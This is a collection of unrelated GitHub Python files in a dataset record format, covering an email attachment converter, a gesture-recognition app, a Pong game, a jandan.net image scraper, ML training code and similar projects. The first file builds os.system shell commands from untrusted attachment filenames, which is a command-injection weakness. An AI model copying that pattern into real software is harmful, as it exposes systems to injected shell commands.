convert_attachment_file(self, attach_name: str):\n os.makedirs(self.tmp_fldr, exist_ok=True)\n attachment_path = f'{self.tmp_fldr}/{attach_name}'\n self.log.info(attachment_path)\n\n if attach_name.split('.')[-1] == 'doc':\n self.log.info('converting')\n cmd = f'lowriter --convert-to docx \"{attachment_path}\" --outdir \"{self.tmp_fldr}\"'\n os.system(cmd)\n elif attach_name.split('.')[-1] == 'pdf':\n self.log.info('converting')\n fltr = 'writer_pdf_import'\n cmd = f'libreoffice --infilter=\"{fltr}\" --convert-to docx \"{attachment_path}\" --outdir \"{self.tmp_fldr}\"'\n 
os.system(cmd)\n elif attach_name.split('.')[-1] == 'xlsx' or attach_name.split('.')[-1] == 'xls':\n self.log.info('converting')\n cmd = f'unoconv -f csv \"{attachment_path}\"'\n os.system(cmd)\n return attachment_path\n\n def org_structure(self, inn, bik, r_account, corr_account, email, first, middle, last, tel, website, address):\n return {\n 'inn': [inn if len(inn) == 10 or len(inn) == 12 else inn + '*'][0],\n 'bik': [bik if len(bik) == 9 else bik + '*'][0],\n 'r_account': [r_account if len(r_account) == 20 else r_account + '*'][0],\n 'c_account': [corr_account if len(corr_account) == 20 else corr_account + '*'][0],\n 'email': email,\n \"first\": first,\n \"middle\": middle,\n \"last\": last,\n \"phone\": tel,\n \"website\": website,\n \"address\": address,\n }\n\n def file_parsing(self, message_text, attach_texts, header_from):\n organization_dict, result = {}, []\n self.log.info(Parsers.clean_text(message_text))\n for attach_name, full_text in attach_texts.items():\n self.log.info(attach_name)\n card = Parsers.clean_text(full_text) # full_text att_text\n self.log.info(card)\n\n inn = Parsers.parse_inn(card)\n bik = Parsers.parse_bik(card)\n corr_account = Parsers.parse_corr_account(card)\n r_account = Parsers.parse_r_account(card)\n email = Parsers.get_email(message_text, header_from)\n first, last, middle = Parsers.get_name(message_text, header_from)\n tel = Parsers.parse_tel(Parsers.clean_text(message_text))\n address = Parsers.get_address(full_text)\n website_check = (\n len(Parsers.get_website(message_text)) == 0 and len(email) > 0\n and\n 'yandex' not in email and 'gmail' not in email and 'mail.ru' not in email and 'bk.ru' not in email\n )\n website = 'www.' + email.split('@')[-1] if website_check else Parsers.get_website(message_text)\n\n organization_dict[str(attach_name).split('/')[-1]] = self.org_structure(\n inn, bik, r_account, corr_account, email, first, middle, last, tel, website, address\n )\n\n self.log.info(str(organization_dict))\n result.append(organization_dict)\n\n return result\n\n def get_message_text(self, parsed_eml):\n message_text = ''\n header_from = parsed_eml['header']['header']['from'][0]\n if len(parsed_eml['body']) > 0:\n message_text += html2text.html2text(parsed_eml['body'][-1]['content'])\n return message_text, header_from\n","repo_name":"varsey/serverless-container","sub_path":"src/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36731706659","text":"import cv2 as cv\n\nfrom wizard.application.video_capture import VideoCapture\nfrom wizard.detectors.hand_gesture_detector import HandGestureDetector\nfrom wizard.application.app_startegy import HumanComputerInteractionApp, DatasetRecordingApp\nfrom wizard.application.painter import Painter\nfrom wizard.configuration.paths import backend_folder_path\n\n\nclass MainApp:\n\n def __init__(self):\n self.video_capture = VideoCapture()\n self.hand_gesture_detector = HandGestureDetector()\n self.context = HumanComputerInteractionApp()\n self.painter = Painter()\n\n self.video = cv.VideoWriter('video.mp4',\n cv.VideoWriter_fourcc(*'XVID'),\n 10, (int(self.video_capture.cap.get(3)), int(self.video_capture.cap.get(4))))\n\n\n def __del__(self):\n cv.destroyAllWindows()\n self.video.release()\n\n\n def run(self):\n while True:\n key = cv.waitKey(1)\n if key == ord('q'):\n break\n elif ord('0') <= key <= ord('9'):\n self.context.update_with_parameters({'gesture_id': 
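In `org_structure` above, validity flags are added with the `[a if cond else b][0]` idiom, which builds a one-element list only to index it. A plain conditional expression expresses the same length check; `mark_if_bad_length` is a hypothetical helper, not part of this codebase:

```python
# Equivalent to e.g. [inn if len(inn) == 10 or len(inn) == 12 else inn + '*'][0]
def mark_if_bad_length(value: str, *valid_lengths: int) -> str:
    # Append '*' to flag a value whose length is not one of the accepted ones.
    return value if len(value) in valid_lengths else value + '*'

print(mark_if_bad_length('1234567890', 10, 12))  # '1234567890' (valid INN length)
print(mark_if_bad_length('12345', 9))            # '12345*' (flagged BIK)
```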
int(chr(key))})\n else:\n self.decide_strategy(key)\n\n ret, frame = self.video_capture.read()\n if not ret:\n break\n\n hand_gestures = self.hand_gesture_detector.process_frame(frame)\n if hand_gestures:\n self.context.handle_hand_gestures(hand_gestures)\n\n # Draw Hand gestures info\n for gesture in hand_gestures:\n rect = self.painter.calc_bounding_rect(frame, gesture.landmarks)\n \n frame = self.painter.draw_info_text(frame, gesture.name, rect)\n frame = self.painter.draw_bounding_rect(frame, rect)\n frame = self.painter.draw_landmarks(frame, gesture.landmarks)\n \n if gesture.id == 3:\n frame = self.painter.draw_line_between_fingers(frame, gesture.landmarks, \n self.hand_gesture_detector.mp_hands.HandLandmark.THUMB_TIP,\n self.hand_gesture_detector.mp_hands.HandLandmark.INDEX_FINGER_TIP)\n \n\n cv.imshow('Wizard', frame)\n # self.video.write(frame)\n \n def decide_strategy(self, key):\n if key == ord('d'):\n self.context = DatasetRecordingApp()\n elif key == ord('n'):\n self.context = HumanComputerInteractionApp()\n","repo_name":"Pasemko/wizard","sub_path":"wizard/application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22067273879","text":"# Stdlib imports\n\n# Core Django imports\nfrom django.conf.urls import url\n\n# Third-party app imports\n\n# Imports from apps\nfrom . import views\n\napp_name='tutorial'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^build_a_bundle/$', views.build_a_bundle, name='build_a_bundle'),\n url(r'^build_a_bundle/bundle_and_collections/$', views.bundle_and_collections, name='bundle_and_collections'),\n url(r'^build_a_bundle/(?P\\d+)/collection_context/$', views.collection_context, name='collection_context'),\n url(r'^build_a_bundle/(?P\\d+)/collection_data/$', views.collection_data, name='collection_data'),\n url(r'^build_a_bundle/(?P\\d+)/collection_document/$', views.collection_document, name='collection_document'),\n\n]\n","repo_name":"atmospheresnode/ELSA","sub_path":"tutorial/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73363791548","text":"import re\nimport sys\n\nif __name__ == \"__main__\":\n auto = True\n if auto:\n inp = 'blabla is a tandem repetition\\n123123 is good too\\ngo go\\naaa'.split('\\n')\n else:\n inp = sys.stdin\n for line in inp:\n if re.search(r'\\b(\\w{2,})\\1\\b', line.strip()):\n print(line)\n","repo_name":"expo-lux/stepik_python_essentials_and_applications","sub_path":"task_3_2_11_regexp.py","file_name":"task_3_2_11_regexp.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25553403588","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom pydolphinscheduler.core.engine import Engine, ProgramType\n\nTEST_ENGINE_TASK_TYPE = \"ENGINE\"\nTEST_MAIN_CLASS = \"org.apache.examples.mock.Mock\"\nTEST_MAIN_PACKAGE = \"Mock.jar\"\nTEST_PROGRAM_TYPE = ProgramType.JAVA\n\n\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_get_jar_detail(mock_resource, mock_code_version):\n \"\"\"Test :func:`get_jar_id` can return expect value.\"\"\"\n name = 
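The tandem-repetition search in the record above hinges on the backreference `\1`, which must repeat the exact text captured by `(\w{2,})`. A standalone demonstration, with sample lines of my own:

```python
# \b(\w{2,})\1\b matches a word formed by the same chunk written twice in a row.
import re

pattern = re.compile(r'\b(\w{2,})\1\b')
for line in ['blabla is a tandem repetition', '123123 is good too', 'go go', 'aaa']:
    if pattern.search(line):
        print(line)  # prints only the 'blabla' and '123123' lines
```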
\"test_get_jar_detail\"\n task = Engine(\n name,\n TEST_ENGINE_TASK_TYPE,\n TEST_MAIN_CLASS,\n TEST_MAIN_PACKAGE,\n TEST_PROGRAM_TYPE,\n )\n assert 1 == task.get_jar_id()\n\n\n@pytest.mark.parametrize(\n \"attr, expect\",\n [\n (\n {\n \"name\": \"test-task-params\",\n \"task_type\": \"test-engine\",\n \"main_class\": \"org.apache.examples.mock.Mock\",\n \"main_package\": \"TestMock.jar\",\n \"program_type\": ProgramType.JAVA,\n },\n {\n \"mainClass\": \"org.apache.examples.mock.Mock\",\n \"mainJar\": {\n \"id\": 1,\n },\n \"programType\": ProgramType.JAVA,\n \"localParams\": [],\n \"resourceList\": [],\n \"dependence\": {},\n \"conditionResult\": {\"successNode\": [\"\"], \"failedNode\": [\"\"]},\n \"waitStartTimeout\": {},\n },\n )\n ],\n)\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_property_task_params(mock_resource, mock_code_version, attr, expect):\n \"\"\"Test task engine task property.\"\"\"\n task = Engine(**attr)\n assert expect == task.task_params\n\n\n@pytest.mark.parametrize(\n \"attr, expect\",\n [\n (\n {\n \"name\": \"test-task-test_engine_get_define\",\n \"task_type\": \"test-engine\",\n \"main_class\": \"org.apache.examples.mock.Mock\",\n \"main_package\": \"TestMock.jar\",\n \"program_type\": ProgramType.JAVA,\n },\n {\n \"code\": 123,\n \"name\": \"test-task-test_engine_get_define\",\n \"version\": 1,\n \"description\": None,\n \"delayTime\": 0,\n \"taskType\": \"test-engine\",\n \"taskParams\": {\n \"mainClass\": \"org.apache.examples.mock.Mock\",\n \"mainJar\": {\n \"id\": 1,\n },\n \"programType\": ProgramType.JAVA,\n \"localParams\": [],\n \"resourceList\": [],\n \"dependence\": {},\n \"conditionResult\": {\"successNode\": [\"\"], \"failedNode\": [\"\"]},\n \"waitStartTimeout\": {},\n },\n \"flag\": \"YES\",\n \"taskPriority\": \"MEDIUM\",\n \"workerGroup\": \"default\",\n \"failRetryTimes\": 0,\n \"failRetryInterval\": 1,\n \"timeoutFlag\": \"CLOSE\",\n \"timeoutNotifyStrategy\": None,\n \"timeout\": 0,\n },\n )\n ],\n)\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_engine_get_define(mock_resource, mock_code_version, attr, expect):\n \"\"\"Test task engine function get_define.\"\"\"\n task = Engine(**attr)\n assert task.get_define() == expect\n","repo_name":"funnyzpc/dolphinscheduler-2.0.5","sub_path":"dolphinscheduler-python/pydolphinscheduler/tests/core/test_engine.py","file_name":"test_engine.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21388396002","text":"\"\"\"Routes for portfolio.\"\"\"\nfrom flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap\n\n\napp = Flask(__name__)\nBootstrap(app)\n\n\n@app.route('/')\ndef index():\n \"\"\"Display homepage.\"\"\"\n return render_template('homepage.html')\n\nif __name__ == \"__main__\":\n\n app.debug = True\n app.jinja_env.auto_reload = app.debug\n\n app.run()\n","repo_name":"gabrielainsf-zz/personal-website","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 
+{"seq_id":"42856083571","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nCrawls the girl pictures posted on jandan.net (Jiandan)\n'''\nimport re\nimport scrapy\nfrom scrapy import Request\nimport requests\nfrom lxml import etree\nimport base64\n\n\nclass InfoSpider(scrapy.Spider) :\n\n    # Name of this spider\n    name = \"jiandan\"\n    start_url = 'http://jandan.net/ooxx/page-1#comments'\n    next_page = ''\n    headers = {'referer': 'http://jandan.net/',\n               'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'}\n    # Counter recording how many items have been crawled; used to name the locally saved files\n    index = 1\n\n    # The start_requests() method sets up the initial request. It is optional, but I feel an explicit initial method makes this more like a proper spider.\n    #Cookies, user-agent, IP_proxy and other parameters could also be configured here to strengthen the crawler,\n    #but jandan.net does not require cookies or similar parameters, so none are set here.\n\n    def start_requests(self):\n        # Timeout set to 1 second; returns a str\n        html = requests.get(self.start_url, headers=self.headers, timeout=1).text\n        # Parse with etree\n        html = etree.HTML(html)\n        #Use xpath to query the image links. As of 2018/8/12 jandan.net hides the image links; the real links must be inspected via view-source:url and are base64 encoded\n        for link in html.xpath('//div[@class=\"text\"]/p/span[@class=\"img-hash\"]/text()'):\n            #Build the full url\n            link = 'https:' + str(base64.b64decode(link), 'utf-8')\n            #Log progress\n            print('当前抓取链接:', self.next_page, '-----', link)\n            with open('F:/jiandanscrapy/' + '{0}.{1}'.format(self.index, format(link[-4:])), 'wb') as jpg:\n                try:\n                    # Fetch and save the data; if the link is invalid, continue the loop\n                    r = requests.get(link, headers=self.headers, timeout=1)\n                    r.raise_for_status()\n                    jpg.write(r.content)\n                    # Log progress\n                    print(\"正在抓取第%s条数据\" % self.index, '文件保存为:{0}.{1}'.format(self.index, format(link[-4:])))\n                except:\n                    continue\n            self.index += 1\n        # Query the next-page link; if it is not empty, enter the parse loop\n        self.next_page = 'https:' + str(html.xpath('//div[@class=\"comments\"]/div[@class=\"cp-pagenavi\"]/a[@title=\"Newer Comments\"]/@href')[1])\n        if self.next_page is not None:\n            yield Request(self.next_page, callback=self.parse)\n        #\n\n\n    # The parse method is invoked through the callback passed to Request\n    def parse(self, response):\n        # Decode the response\n        response = response.text\n        # Parse the response with etree\n        html = etree.HTML(response)\n        # The for loop below is the same as the one above\n        for link in html.xpath('//div[@class=\"text\"]/p/span[@class=\"img-hash\"]/text()'):\n            link = 'https:' + str(base64.b64decode(link), 'utf-8')\n            print('当前抓取链接:', self.next_page, '-----', link)\n            with open('F:/jiandanscrapy/' + '{0}.{1}'.format(self.index, format(link[-4:])), 'wb') as jpg:\n                try:\n                    r = requests.get(link,headers=self.headers, timeout=1)\n                    r.raise_for_status()\n                    jpg.write(r.content)\n                    print(\"正在抓取第%s条数据\" % self.index, '文件保存为:{0}.{1}'.format(self.index, format(link[-4:])))\n                except:\n                    continue\n            self.index += 1\n\n        # Build the next-page url in the same way\n        self.next_page = 'https:' + str(html.xpath('//div[@class=\"comments\"]/div[@class=\"cp-pagenavi\"]/a[@title=\"Newer Comments\"]/@href')[1])\n        if self.next_page is not None:\n            # yield a Request with parse as the callback\n            yield Request(self.next_page, callback=self.parse)\n        #\n","repo_name":"1344098010/scrapy_jandan","sub_path":"jd_scrapy/jd_scrapy/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"5011385437","text":"#!/usr/local/bin/python3.4\nimport glob\nimport sys\nimport os\nimport filecmp\nimport re\n\n\ndef convertToAttrib():\n    with open(\"rawGrades.xml\",\"r\") as f:\n        lines = f.read()\n    o = open(\"finalGrades.xml\",'w', newline=\"\\r\\n\")\n    lines = lines.strip(\" \")\n    #print(lines)\n    ID = re.findall(r\"<(.*?)>(.*?):(.*?)</(.*?)>\",lines)\n\n    o.write(\"\")\n    o.write(\"\\n\")\n    #print(ID[0])\n    subject = []\n    for i in range(0,len(ID)):\n        marks = {}\n        id = ID[i][0]\n        name = ID[i][1]\n        rest = ID[i][2]\n        id2 = ID[i][3]\n        if 
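The link-decoding step the spider above applies to the hidden image hashes, shown in isolation; the hash value here is a fabricated stand-in, not a real jandan.net hash:

```python
# Recreate an encoded hash, then decode it exactly as the spider does.
import base64

img_hash = base64.b64encode(b'//img.example.com/pic.jpg').decode()  # stand-in value
link = 'https:' + str(base64.b64decode(img_hash), 'utf-8')
print(link)  # https://img.example.com/pic.jpg
```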
id == id2:\n o.write(\"\\n \")\n marks_subject = re.findall(r\"\\[(.*?):(.*?)\\]\",rest)\n for i in range(0,len(marks_subject)):\n marks[marks_subject[i][0]] = marks_subject[i][1]\n keylist = []\n new = []\n new = marks.keys()\n for key in new:\n keylist.append(key)\n keylist.sort()\n for key in keylist:\n value = marks[key]\n o.write(\"\\n \")\n if(int(value) >= 60 and int(value) < 70):\n o.write(\"D\\\"/>\")\n if(int(value) >= 70 and int(value) < 80):\n o.write(\"C\\\"/>\")\n if(int(value) >= 80 and int(value) < 90):\n o.write(\"B\\\"/>\")\n if(int(value) >= 90):\n o.write(\"A\\\"/>\")\n o.write(\"\\n \")\n o.write(\"\\n\")\n o.close()\n\nif __name__ == \"__main__\":\n convertToAttrib()","repo_name":"bishop1612/ECE364","sub_path":"Lab09/generateReport.py","file_name":"generateReport.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21972881894","text":"import copy\nimport util\n\n\ndef train(model, x_train, y_train, x_valid, y_valid, config):\n \"\"\"\n Learns the weights (parameters) for our model\n Implements mini-batch SGD to train the model.\n Implements Early Stopping.\n Uses config to set parameters for training like learning rate, momentum, etc.\n\n args:\n model - an object of the NeuralNetwork class\n x_train - the train set examples\n y_train - the test set targets/labels\n x_valid - the validation set examples\n y_valid - the validation set targets/labels\n\n returns:\n the trained model\n \"\"\"\n\n batch_size = config[\"batch_size\"]\n num_epochs = config[\"epochs\"]\n early_stopping = config[\"early_stop_epoch\"]\n early_stop_on = config[\"early_stop\"]\n\n train_epoch_loss = []\n train_epoch_accuracy = []\n val_epoch_loss = []\n val_epoch_accuracy = []\n best_model = None\n best_val_accuracy = 0\n epochs_since_last_improvement = 0\n early_stop = -1\n\n for epoch in range(num_epochs):\n\n num_correct = 0\n\n total_loss = 0\n\n for x_batch, y_batch in util.generate_minibatches((x_train, y_train), batch_size):\n loss, accuracy = model.forward(x_batch, y_batch)\n\n model.backward()\n\n num_correct += util.calculateCorrect(model.y, y_batch)\n\n total_loss += loss\n\n train_accuracy = num_correct / len(x_train)\n\n train_loss = total_loss / len(x_train)\n\n train_epoch_loss.append(train_loss)\n train_epoch_accuracy.append(train_accuracy)\n\n val_accuracy, valLoss = model_test(model, x_valid, y_valid)\n\n val_epoch_loss.append(valLoss)\n val_epoch_accuracy.append(val_accuracy)\n\n if val_accuracy > best_val_accuracy:\n\n best_val_accuracy = val_accuracy\n\n best_model = copy.deepcopy(model)\n\n epochs_since_last_improvement = 0\n\n early_stop = epoch\n\n else:\n\n epochs_since_last_improvement += 1\n\n if epochs_since_last_improvement > early_stopping and early_stop_on:\n break\n\n print(\"Epoch: \", epoch, \"Training Loss: \", train_loss, \"Training Accuracy: \", train_accuracy,\n \"Validation Loss: \", valLoss, \"Validation Accuracy: \", val_accuracy)\n\n print(\"Best Validation Accuracy: \", best_val_accuracy)\n\n print(\"Early Stop: \", early_stop)\n\n util.plots(train_epoch_loss, train_epoch_accuracy, val_epoch_loss, val_epoch_accuracy, early_stop)\n\n return best_model\n\n\ndef model_test(model, X_test, y_test):\n \"\"\"\n Calculates and returns the accuracy & loss on the test set.\n\n args:\n model - the trained model, an object of the NeuralNetwork class\n X_test - the test set examples\n y_test - the test set targets/labels\n\n returns:\n test accuracy\n test loss\n 
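The early-stopping bookkeeping that `train()` above implements (snapshot the best model, count stale epochs, stop after too many misses) in condensed form; `evaluate` and `model` are stand-ins rather than this module's real objects:

```python
# Minimal early-stopping loop, assuming evaluate() runs one epoch and
# returns the validation accuracy.
import copy

def early_stopping_loop(model, evaluate, num_epochs=30, patience=5):
    best_acc, best_model, stale = 0.0, None, 0
    for epoch in range(num_epochs):
        val_acc = evaluate(model, epoch)
        if val_acc > best_acc:
            best_acc, stale = val_acc, 0
            best_model = copy.deepcopy(model)  # keep a snapshot of the best weights
        else:
            stale += 1
        if stale > patience:  # no improvement for `patience` epochs: stop
            break
    return best_model
```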
\"\"\"\n\n num_correct = 0\n\n total_loss = 0\n\n for x_batch, y_batch in util.generate_minibatches((X_test, y_test), 1):\n loss, accuracy = model.forward(x_batch, y_batch)\n\n num_correct += util.calculateCorrect(model.y, y_batch)\n\n total_loss += loss\n\n test_accuracy = num_correct / len(X_test)\n\n test_loss = total_loss / len(X_test)\n\n return test_accuracy, test_loss\n","repo_name":"Anirudhaagrawal/cifar-100-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23928888379","text":"import tweepy\nimport pandas as pd\n\nfrom datetime import date, timedelta\nfrom loguru import logger\nfrom textblob import TextBlob\nfrom textblob.exceptions import NotTranslated\nfrom .model import Tweet, TweetComputed\n\n\nclass UpdateCommand:\n def __init__(\n self, consumer_key, consumer_secret, access_token, access_token_secret\n ):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n self._twitter = tweepy.API(auth)\n\n def execute(self):\n tweets = self._twitter.search(\"Bolsonaro\")\n logger.info(f\"fetched {len(tweets)} new tweets from twitter\")\n for tweet in tweets:\n try:\n created_at = pd.to_datetime(tweet.created_at, utc=True).tz_convert(\n \"America/Sao_Paulo\"\n )\n frase = TextBlob(tweet.text)\n if frase.detect_language() != \"en\":\n traducao = TextBlob(\n str(frase.translate(from_lang=frase.detect_language(), to=\"en\"))\n )\n Tweet(\n tweet.id,\n str(created_at),\n traducao.sentiment[0],\n traducao.sentiment[1],\n tweet.text,\n str(traducao),\n ).save()\n else:\n Tweet(\n str(created_at), frase.sentiment[0], frase.sentiment[1], tweet.text\n ).save()\n except NotTranslated as e:\n logger.error(f\"error to translate tweet: {e}\")\n logger.success(\"finish\")\n\n\nclass ComputeCommand:\n def __init__(self):\n pass\n\n def get_percent(self, value, value_total):\n return float(\"{0:.2f}\".format((value / value_total) * 100))\n\n def execute(self, days_back):\n df = pd.DataFrame(Tweet().get({\"sentiment_polarity\": {\"$ne\": 0}}))\n df[\"created_at\"] = pd.to_datetime(df[\"created_at\"])\n df.set_index(\"created_at\", inplace=True)\n date_used = str(date.today() - timedelta(days_back))\n logger.info(f\"date used to compute: {date_used}\")\n try:\n df = df[date_used]\n tweet_computed = TweetComputed(\n len(df),\n self.get_percent(len(df[df[\"sentiment_polarity\"] < 0]), len(df)),\n len(df[df[\"sentiment_polarity\"] < 0]),\n date_used,\n )\n tweet_computed.save()\n except Exception as e:\n logger.error(f\"error to compute tweets: {e}\")\n","repo_name":"msAlcantara/bozohate","sub_path":"bozohate/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"6193417217","text":"# Welcome to Po's Python Pong Game\n# By Po Kealiinohomoku\n# Intensive Project 1\n\nimport turtle\n\n# Screen setup\n\nwin = turtle.Screen()\nwin.title(\"Po's Python Pong\")\nwin.bgcolor(\"black\")\nwin.setup(width=800, height=600)\nwin.tracer(0)\n\n\n# Gameplay objects\n\n\n# Score Variables\nscore_a = 0\nscore_b = 0\n\n\n# Player 1 Paddle\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350, 0)\n\n# Player 2 Paddle\npaddle_b = 
turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350, 0)\n\n\n# Game Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.penup()\nball.goto(0, 0)\n\n\n# Scoreboard\ntitle = turtle.Turtle()\ntitle.speed(0)\ntitle.color(\"white\")\ntitle.penup()\ntitle.hideturtle()\ntitle.goto(0, 260)\ntitle.write(\"P1 score: 0 | P2 score: 0\",\n align=\"center\", font=(\"Chiller\", 22, \"normal\"))\n\n# Game Ball Physics\nball.dx = 4\nball.dy = 2\n\n\n# Player Input Functions\n\n\n# Paddle a\ndef paddle_a_up():\n y = paddle_a.ycor()\n y += 20\n paddle_a.sety(y)\n\n\ndef paddle_a_down():\n y = paddle_a.ycor()\n y -= 20\n paddle_a.sety(y)\n\n\n# Paddle b\ndef paddle_b_up():\n y = paddle_b.ycor()\n y += 20\n paddle_b.sety(y)\n\n\ndef paddle_b_down():\n y = paddle_b.ycor()\n y -= 20\n paddle_b.sety(y)\n\n\nwin.listen()\nwin.onkeypress(paddle_a_up, \"w\")\nwin.onkeypress(paddle_a_down, \"s\")\nwin.onkeypress(paddle_b_up, \"Up\")\nwin.onkeypress(paddle_b_down, \"Down\")\n\n\n# Main Game Loop\nwhile True:\n win.update()\n\n # Move Ball Code\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n # Basic Border Checking\n if ball.xcor() > 390:\n ball.dx *= -1\n ball.goto(0, 0)\n title.clear()\n score_a += 1\n title.write(\"P1 score: \" + str(score_a) + \" | P2 score: \" +\n str(score_b), align=\"center\", font=(\"Courier\", 22, \"normal\"))\n\n if ball.xcor() < -390:\n ball.dx *= -1\n ball.goto(0, 0)\n title.clear()\n score_b += 1\n title.write(\"P1 score: \" + str(score_a) + \" | P2 score: \" +\n str(score_b), align=\"center\", font=(\"Courier\", 22, \"normal\"))\n\n if ball.ycor() > 290:\n ball.dy *= -1\n\n if ball.ycor() < -290:\n ball.dy *= -1\n\n # Collision Dectecting\n\n if(ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor()+50 and ball.ycor() > paddle_b.ycor()-50):\n ball.dx = ball.dx * -1\n\n if(ball.xcor() > -350 and ball.xcor() < -340) and (ball.ycor() < paddle_a.ycor()+50 and ball.ycor() > paddle_a.ycor()-50):\n ball.dx = ball.dx * -1\n","repo_name":"KuponoK/pos-python-pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17807524086","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n\r\n\r\nclass IQR():\r\n\r\n def __init__(self):\r\n #self.use_classes = [\r\n #'Outside_Air_Temperature_Sensor',\r\n #'Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor',\r\n #Cooling_Valve', 'Reheat_Valve', 'Valve',\r\n #'Differential_Pressure_Sensor',\r\n #'Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor',\r\n #'Heat_Exchanger', 'Variable_Frequency_Drive',\r\n #'Return_Fan', 'Supply_Fan',\r\n #'Power_Sensor',\r\n #'Pump',\r\n #'Energy_Sensor'\r\n #]\r\n self.use_classes = ['Outside_Air_Temperature_Sensor']\r\n\r\n\r\n def read_features_from_file(self, filename, inv_features= [], short_files=[]):\r\n print(\"reading from file\")\r\n feature_dict = {}\r\n file_dict = {}\r\n f = open(filename, \"r\", encoding=\"UTF-8\")\r\n invalid_features = inv_features\r\n #count = 
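The paddle collision tests in the pong loop above repeat the same x/y range comparisons inline. A hedged refactor of that hit-test into one helper, with thresholds copied from the original conditions:

```python
# True when the ball is within the paddle's x band and within 50 px of its center.
def hits_paddle(ball_x, ball_y, x_min, x_max, paddle_y):
    return x_min < ball_x < x_max and paddle_y - 50 < ball_y < paddle_y + 50

# Right paddle, equivalent to the original inline check:
# if hits_paddle(ball.xcor(), ball.ycor(), 340, 350, paddle_b.ycor()): ball.dx *= -1
```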
0\r\n for line in f:\r\n #count += 1\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if sensor not in self.use_classes or line[0].strip() in short_files: #Skips sensor if it is not relevant\r\n continue\r\n for i in range(len(self.use_classes)):\r\n if sensor == self.use_classes[i]:\r\n sensor = i\r\n \r\n if sensor not in feature_dict: #If sensor is not already a key in the dictionary\r\n feature_dict[sensor] = []\r\n file_dict[sensor] = []\r\n sensor_features = {}\r\n\r\n file_dict[sensor].append(line[0])\r\n \r\n for i in range(1, len(line)-1, 2):\r\n \r\n if line[i+1] == \"nan\":\r\n sensor_features[line[i]] = 1\r\n if line[i] not in invalid_features:\r\n invalid_features.append(line[i])\r\n else: \r\n sensor_features[line[i]] = float(line[i+1])\r\n \r\n feature_dict[sensor].append(sensor_features)\r\n #print(f\"num_files: {count}\")\r\n #feature_dict = self.remove_invalid_values(feature_dict, list(set(invalid_features)))\r\n return feature_dict, invalid_features\r\n\r\n def read_features_from_file2(self, filename, invalid):\r\n feature_dict = {}\r\n f = 